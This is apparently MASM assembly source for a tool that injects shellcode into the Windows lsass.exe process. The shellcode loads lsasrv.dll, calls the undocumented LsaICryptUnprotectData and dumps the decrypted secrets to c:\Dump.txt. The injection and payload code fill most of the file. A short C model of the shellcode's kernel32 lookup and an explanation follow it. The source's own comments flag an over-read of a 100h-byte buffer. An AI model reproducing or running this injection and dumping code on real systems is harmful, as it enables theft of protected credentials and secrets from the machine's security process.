;http://mnin.blogspot.com/2007/05/injecting-code-into-privileged-win32.html <-- Injecting into Lsass.exe security
;
; Injects a position-independent routine into lsass.exe with
; VirtualAllocEx / WriteProcessMemory / CreateRemoteThread. The injected
; routine locates kernel32 through the PEB loader list, loads lsasrv.dll,
; calls the undocumented LsaICryptUnprotectData and writes the result to
; c:\Dump.txt. Opening lsass.exe with PROCESS_ALL_ACCESS requires
; SeDebugPrivilege in the caller's token.

.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\lsasrv.inc
include \masm32\include\ntdll.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\lsasrv.lib
includelib \masm32\lib\ntdll.lib

CLIENTID struct
    UniqueProcess dd ?
    UniqueThread  dd ?
CLIENTID ends

.const
PROCESS_HANDLE equ 0
PROCESS_ID     equ 1

.data
szProcess        db 'lsass.exe',0
szKernel         db 'KERNEL32',0
szGetProcAddress db 'GetProcAddress',0
szFailed         db 'Failed',0

.data?
hProcess    dd ?
lpInjected  dd ?
lenInjected dd ?
pInfo       PROCESS_INFORMATION <>
sInfo       STARTUPINFO <>
myCID       CLIENTID <>
hThread     dd ?

Injected PROTO :DWORD

.code

; Position-independent payload copied verbatim (Injected..EndInjected) into
; the target. All strings are embedded inline and addressed with the
; call/pop trick; imports are resolved at run time and kept in Stack[].
Injected PROC lpGetProcAddress:DWORD
    LOCAL Stack[20h]:dword          ; resolved pointers, see slot comments below
    LOCAL entropy[16]:byte
    LOCAL Buffer[100h]:byte
    LOCAL cbSize:dword
    LOCAL BytesReturned:dword

    ASSUME fs:NOTHING
    push ebp                        ; ebp is reused as a scratch register below
    xor eax,eax
    mov esi,fs:[eax+30h]            ; TEB->PEB
    mov esi,[esi+0Ch]               ; PEB->Ldr
    mov esi,[esi+1Ch]               ; Ldr->InInitializationOrderModuleList.Flink
next_module:
    mov ebp,[esi+08h]               ; entry->DllBase
    mov edi,[esi+20h]               ; entry->BaseDllName.Buffer (UTF-16)
    mov esi,[esi]                   ; entry->Flink
    cmp [edi+12*2],al               ; 13th wide char NUL => 12-char name ("kernel32.dll")
    jne next_module
    cmp byte ptr [edi],6Bh          ; 'k'
    je find_kernel32_finished
    cmp byte ptr [edi],4Bh          ; 'K'
    je find_kernel32_finished
    jmp next_module
find_kernel32_finished:
    mov ecx,ebp                     ; ecx = kernel32 base
    pop ebp                         ; restore frame pointer before touching LOCALs
    mov eax,lpGetProcAddress
    mov Stack,eax                   ; Stack[0] = GetProcAddress (same base in all processes, no ASLR)
    mov Stack+4,ecx                 ; Stack[1] = hKernel32

    call loc_1
    _szLoadLibraryA db "LoadLibraryA",0
loc_1:
    pop ecx
    invoke (type GetProcAddress) ptr Stack, Stack+4, ecx
    mov Stack+8,eax                 ; Stack[2] = LoadLibraryA

    call loc_2
    _szlsasrv db "lsasrv.dll",0
loc_2:
    pop ecx
    invoke (type LoadLibrary) ptr Stack+8, ecx
    mov Stack+12,eax                ; Stack[3] = hLsasrv

    call loc_3
    _szLsaICryptUnprotectData db "LsaICryptUnprotectData",0
loc_3:
    pop ecx
    invoke (type GetProcAddress) ptr Stack, Stack+12, ecx
    mov Stack+16,eax                ; Stack[4] = LsaICryptUnprotectData

    ; Undocumented internal API; argument values taken from the original.
    ; NOTE: Buffer is only 100h bytes while 0FFFFh is passed here and to
    ; WriteFile, so the dump reads past the local buffer up the stack.
    invoke (type LsaICryptUnprotectData) ptr Stack+16, ADDR Buffer, 0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize

    call loc_4
    _szCreateFileA db "CreateFileA",0
loc_4:
    pop ecx
    invoke (type GetProcAddress) ptr Stack, Stack+4, ecx
    mov Stack+20,eax                ; Stack[5] = CreateFileA

    call loc_5
    _szWriteFile db "WriteFile",0
loc_5:
    pop ecx
    invoke (type GetProcAddress) ptr Stack, Stack+4, ecx
    mov Stack+24,eax                ; Stack[6] = WriteFile

    call loc_6
    _szCloseHandle db "CloseHandle",0
loc_6:
    pop ecx
    invoke (type GetProcAddress) ptr Stack, Stack+4, ecx
    mov Stack+28,eax                ; Stack[7] = CloseHandle

    call loc_7
    _szExitThread db "ExitThread",0
loc_7:
    pop ecx
    invoke (type GetProcAddress) ptr Stack, Stack+4, ecx
    mov Stack+32,eax                ; Stack[8] = ExitThread

    call loc_8
    FileName db "c:\Dump.txt",0
loc_8:
    pop ecx
    ;BreakpointHere db 0cch
    invoke (type CreateFileA) ptr Stack+20, ecx, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
    mov Stack+36,eax                ; Stack[9] = hFile (kept in memory: ecx is clobbered by WriteFile)
    invoke (type WriteFile) ptr Stack+24, Stack+36, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0
    invoke (type CloseHandle) ptr Stack+28, Stack+36
    invoke (type ExitThread) ptr Stack+32, 0
    ret                             ; never reached
Injected endp
EndInjected:

; Returns the PID of _exename, or (with PROCESS_HANDLE) an all-access handle
; to it. Returns 0 when no such process exists.
FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword
    LOCAL Process:PROCESSENTRY32

    lea esi,Process
    assume esi:ptr PROCESSENTRY32
    mov [esi].dwSize,sizeof PROCESSENTRY32
    invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
    mov edi,eax
    invoke Process32First,edi,esi
    .while eax!=FALSE
        lea eax,[esi].szExeFile
        invoke lstrcmpi,eax,_exename
        .if eax==0
            ;---found process---
            mov eax,[esi].th32ProcessID
            jmp @return
        .endif
        invoke Process32Next,edi,esi
    .endw
@return:                            ; eax = PID, or 0 if the loop ran out
    assume esi:nothing
    push eax
    invoke CloseHandle,edi
    pop eax
    .if _returntype==PROCESS_HANDLE
        invoke OpenProcess,PROCESS_ALL_ACCESS,0,eax   ;return hProcess (0 on failure)
    .endif
    ret
FindProcessByName endp

start:
    ; Local test harness: run the payload in-process instead of injecting.
    ;invoke GetModuleHandle,addr szKernel
    ;invoke GetProcAddress,eax,addr szGetProcAddress
    ;invoke Injected,EAX
    ;invoke ExitProcess,0

    mov ebx,EndInjected
    sub ebx,Injected
    mov lenInjected,ebx             ; payload size = EndInjected - Injected

    invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE
    .IF EAX == 0                    ; lsass.exe not found or OpenProcess denied
        invoke MessageBoxA,0,ADDR szFailed,ADDR szFailed,0
        invoke ExitProcess,1
    .ENDIF
    mov hProcess,eax
    invoke VirtualAllocEx,hProcess,0,lenInjected,MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
    mov lpInjected,eax
    invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0
    ;invoke EnableTokenPrivilege,SE_DEBUG_PRIVILEGE
    invoke GetModuleHandle,addr szKernel
    invoke GetProcAddress,eax,addr szGetProcAddress     ; passed to the payload as its only argument
    ;invoke RtlCreateUserThread,hProcess,0,FALSE,0,0,0,lpInjected,eax,ADDR hThread,ADDR myCID
    invoke CreateRemoteThread,hProcess,0,0,lpInjected,eax,0,0   ;NEEDS DEBUG PRIVILEGE
    .IF EAX == 0
        invoke MessageBoxA,0,ADDR szFailed,ADDR szFailed,0
    .ENDIF
    invoke ExitProcess,0
end start
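The kernel32 lookup at the top of Injected (walk InInitializationOrderModuleList, accept the first entry whose base name is exactly 12 wide characters and begins with 'k' or 'K') modelled in portable C over a constructed module list. This is an added example, not part of the original source: the ldr_entry struct keeps only the three fields the shellcode reads, and the module names and base addresses are illustrative assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef uint16_t wchar16;           /* UNICODE_STRING buffers are UTF-16LE */

/* Model of what Injected reads from each loader entry when following the
 * InInitializationOrderLinks pointer: Flink, DllBase and BaseDllName.Buffer.
 * The real LDR_DATA_TABLE_ENTRY has many more members; this is a stand-in
 * with constructed data, not the Windows layout. */
typedef struct ldr_entry {
    struct ldr_entry *flink;        /* mov esi,[esi]      */
    uintptr_t         dll_base;     /* mov ebp,[esi+08h]  */
    const wchar16    *base_name;    /* mov edi,[esi+20h]  */
} ldr_entry;

/* The shellcode's test: the 13th wide char must be NUL (a 12-character name)
 * and only the low byte of the first wide char is compared against 'k'/'K'. */
static int looks_like_kernel32(const wchar16 *name)
{
    if (name[12] != 0)              /* cmp [edi+12*2],al with al == 0 */
        return 0;
    uint8_t first = (uint8_t)(name[0] & 0xFF);  /* cmp byte ptr [edi],6Bh / 4Bh */
    return first == 'k' || first == 'K';
}

/* Walk the list from head and return the DllBase of the first match, or 0.
 * The real list is circular, so the shellcode never terminates when nothing
 * matches; this model stops at a NULL link instead. */
uintptr_t find_kernel32(const ldr_entry *head)
{
    for (const ldr_entry *e = head; e != NULL; e = e->flink)
        if (looks_like_kernel32(e->base_name))
            return e->dll_base;
    return 0;
}

/* Widen an ASCII name into a zero-filled UTF-16 buffer (constructed data). */
static void to_wide(const char *s, wchar16 *out, size_t cap)
{
    size_t i;
    for (i = 0; i + 1 < cap && s[i]; i++)
        out[i] = (wchar16)(unsigned char)s[i];
    out[i] = 0;
}

static wchar16   g_names[4][32];    /* 32 wide chars so name[12] is always in bounds here;
                                       the shellcode reads that offset even for short names */
static ldr_entry g_list[4];

/* Constructed init-order list: ntdll first, then kernel32 (or a 14-char decoy
 * when include_kernel32 is 0), then two more modules. Bases are illustrative. */
const ldr_entry *sample_list(int include_kernel32)
{
    const char *names[4] = { "ntdll.dll",
                             include_kernel32 ? "KERNEL32.DLL" : "KernelBase.dll",
                             "ADVAPI32.dll", "lsasrv.dll" };
    const uintptr_t bases[4] = { 0x7C900000u, 0x7C800000u, 0x77DD0000u, 0x74A90000u };

    memset(g_names, 0, sizeof g_names);
    for (int i = 0; i < 4; i++) {
        to_wide(names[i], g_names[i], 32);
        g_list[i].flink     = (i + 1 < 4) ? &g_list[i + 1] : NULL;
        g_list[i].dll_base  = bases[i];
        g_list[i].base_name = g_names[i];
    }
    return &g_list[0];
}

int main(void)
{
    printf("with kernel32:    0x%08lx\n", (unsigned long)find_kernel32(sample_list(1)));
    printf("without kernel32: 0x%08lx\n", (unsigned long)find_kernel32(sample_list(0)));
    return 0;
}
```

Two properties of the heuristic show up in the model: the uppercase "KERNEL32.DLL" is accepted because the 4Bh branch exists, and "ADVAPI32.dll", although also 12 characters, is rejected only by its first byte, so any 12-character module starting with k or K that loaded before kernel32 would be taken instead. On the systems the original targets (no ASLR, ntdll and kernel32 first in initialisation order) that never happens, which is why the shellcode gets away with checking two bytes.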